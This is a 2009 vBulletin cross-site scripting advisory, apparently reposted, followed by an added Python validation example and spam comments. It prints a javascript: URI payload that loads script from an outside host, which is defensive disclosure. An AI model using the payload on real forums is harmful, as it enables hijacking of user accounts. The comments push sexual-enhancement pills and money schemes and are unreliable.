vBulletin - Cross Site Script Redirection
Posted 13 October 2009, 9:00 AM

Versions Affected: 3.8.4 / 3.7.6 / 3.6.12
Patches Available: 3.8.4PL1 / 3.7.6PL1 / 3.6.12PL1

Info: An XSS flaw within the user profile page has recently been discovered.
This could allow an attacker to carry out an action as a user or obtain
access to a user's account. To resolve this issue, it has been necessary to
release a patch level version of the active versions of vBulletin.

The upgrade process is the same as previous patch level releases - simply
download the patch from the Members Area, extract the files and upload them to
your webserver, overwriting the existing files. There is no upgrade script.

As with all security-based releases, we recommend that all customers
upgrade as soon as possible in order to prevent any potential damage
resulting from the flaw being exploited.

Credits: The original finder of the security hole. (Jelsoft?)

Researched & Disclosed by: MaXe (InterN0T.net)

Official Information:

-:: The Advisory ::-
The "Home Page" field in the user profile only checked that the user input
either contained "www" or matched the following regular expression, written out
in plain words: any letter from A to Z and/or a digit from 0-9 followed by ://
makes the link valid.

The output in the Home Page field is encoded with most likely htmlspecialchars(),
however before the patch it did not check if a user would create a link that
would send an unknowing user to either the data: or javascript URI scheme.

The only limits in the Home Page field are:
- 90 character limit
- Characters will be converted to html entities.
- We can only use the data or javascript URI scheme.

This means that we should avoid " since it becomes &quot;. Other characters
like < become &lt;, which is almost the same as %3C.
Please see how htmlentities() and htmlspecialchars() works in PHP.

The following scheme, entered as the home page, will alert 0:

The following input is a proof of concept that external JavaScript can be loaded:
javascript://%0adocument.write('<script src=http://intern0t.net/.k></script>')

The following URL contains a working Proof of Concept on the Contact Page:
http://forum.intern0t.net/members/maxe.html (will be removed soon)
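As an added illustration (this is not code from the advisory or from vBulletin), the snippet below models the validation the advisory describes beside a stricter allow-list check, and shows why entity-encoding the output does not neutralise a javascript: link. The weak regex, the hardened design, the sample inputs and all function names are assumptions constructed for this example.

```python
import html
import re
from urllib.parse import unquote, urlsplit

# Constructed sample inputs for the "Home Page" field (not taken from the
# advisory, apart from the javascript: scheme it names).
SAMPLE_HOMEPAGES = [
    "http://example.com/",
    "www.example.com",
    "https://example.com/profile?id=1",
    "javascript://%0aalert(0)",   # "//" opens a JS comment, the decoded %0a ends it
    "javascript:alert(0)",        # no "://", so even the weak check rejects it
    "ftp://example.com/",         # well-formed URL, but not a web page
]

# Weak check, modelled on the advisory's description of the original
# validation: the value contains "www" or letters/digits followed by "://".
# Any scheme name satisfies the second alternative, javascript included.
WEAK_RE = re.compile(r"www|[A-Za-z0-9]+://")

def weak_is_valid(value: str) -> bool:
    return WEAK_RE.search(value) is not None

# Hardened check (an assumed design, not vBulletin's actual fix): enforce the
# field's 90-character limit, percent-decode before inspecting so an encoded
# scheme cannot hide, reject control characters, and allow only http(s) URLs
# that carry a host.
ALLOWED_SCHEMES = {"http", "https"}
MAX_LEN = 90

def normalize(value: str) -> str:
    """Accept bare 'www.' hosts, as the original field did, by adding a scheme."""
    value = value.strip()
    if value.lower().startswith("www."):
        return "http://" + value
    return value

def strict_is_valid(value: str) -> bool:
    if len(value) > MAX_LEN:
        return False
    decoded = unquote(normalize(value))
    if any(ch in decoded for ch in "\r\n\t\x00"):
        return False
    try:
        parts = urlsplit(decoded)
        host = parts.hostname
    except ValueError:          # e.g. malformed IPv6 literal
        return False
    return parts.scheme.lower() in ALLOWED_SCHEMES and bool(host)

def render_link(value: str) -> str:
    """Roughly what the profile page did: entity-encode the value into an href.
    html.escape behaves like htmlspecialchars(); it protects the HTML structure,
    not the URL's scheme, so a javascript: value passes through untouched."""
    return '<a href="%s">home page</a>' % html.escape(value, quote=True)

def classify_homepages(values=SAMPLE_HOMEPAGES):
    """Map each input to (accepted by weak check, accepted by strict check)."""
    return {v: (weak_is_valid(v), strict_is_valid(v)) for v in values}

if __name__ == "__main__":
    for value, (weak, strict) in classify_homepages().items():
        print(f"{value!r:40} weak={weak!s:5} strict={strict}")
    print(render_link("javascript://%0aalert(0)"))
```

Running it shows the javascript: input accepted by the weak check and rejected by the strict one, while ordinary http(s) home pages pass both; the rendered link for the javascript: value is byte-for-byte the input, which is the advisory's point about output encoding alone being insufficient.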

-:: Solution ::-
Update to the newest version of vBulletin - 3.8.4PL1 / 3.7.6PL1 / 3.6.12PL1

-:: Conclusion ::-
vBulletin is generally a safe and secure platform to use for large forums.
This security hole / exploit is implausible to actually work against people.
Please see: http://forum.intern0t.net/blogs/maxe/62-having-fun-cross-site-scripting.html for in-depth information.

Disclosure Information:
- Unknown date of when the vendor found the security hole.
- Vendor released patch on the 7th October 2009.
- Security hole researched and disclosed on 8th October 2009.

Disclosure Reference:

All of the best,
Views: 28532 | Added by: apeh1706 | Rating: 0.0/0
Total comments: 39
39 -6100   [Entry]

38 -6099   [Entry]
Any text 2 words

37 VigRXPlus   [Entry]
What do you think, is it true or not what's written here, that you can enlarge the penis with penis enlargement pills - VigRx Plus and Xtrasize? I'm thinking of buying, maybe someone has tried them or knows methods for enlarging the penis at home and without surgery? Here is the site of the official dealer in Ukraine and Russia: http://tele.in.ua/ and here is their Canadian supplier: https://www.vigrxplus.com/ct/144762 , I checked it through a translator and everything there seems fine, but ordering 1 or 3 directly from there is risky and even more expensive than the same Xtrasize, and there's no point, and they say they buy from them 12 at a time, so it's cheaper to buy the already customs-cleared VigRx from them one at a time and not bother with shipping. And I wouldn't want my money from my card to disappear on some foreign site, or the goods themselves on the way! What do you think about this? Waiting for comments!

36 Justinma   [Entry]

35 Any Good iBooks? Yes!   [Entry]
For anyone with an iPad, I recommend this iBook all about graffiti art: Henry Chalfant's Graffiti Archive. It catalogs NYC subway graffiti in the 1980s ... the beginning of Hip Hop! Whether you like art history, urban lore, sociology or even if you just like the pictures, this iBook is really cool. See here: https://itunes.apple.com/us/book/henry-chalfants-big-subway/id531594319?mt=11

34 VetalTynyton   [Entry]
Good day! smile
Maybe it's time to stop working for someone else? While the opportunity still exists, become financially independent!
I'm not pushing it, but if you're interested, read more while the opportunity is still on offer - http://youmyprofi.ru/2/index.html

33 powellmjl   [Entry]
Great post. I used to be checking continuously this blog and I'm impressed! Extremely helpful info specially the closing part :) I handle such information much. I used to be looking for this particular information for a very lengthy time. Thanks and best of luck. http://www.facebook.com/wholesalecheapsunglasseshats

32 Relmtieme   [Entry]
http://onehtcq.jigsy.com/ I have been lurking around here for some time but I haven't made a comment, just thought I would say hello!

31 Intawayfany   [Entry]
Usually dislike any form of commenting, but whenever you read an excellent post sometimes you just need to get out of those lazy approaches. This is such a post!

30 Artelaarope   [Entry]
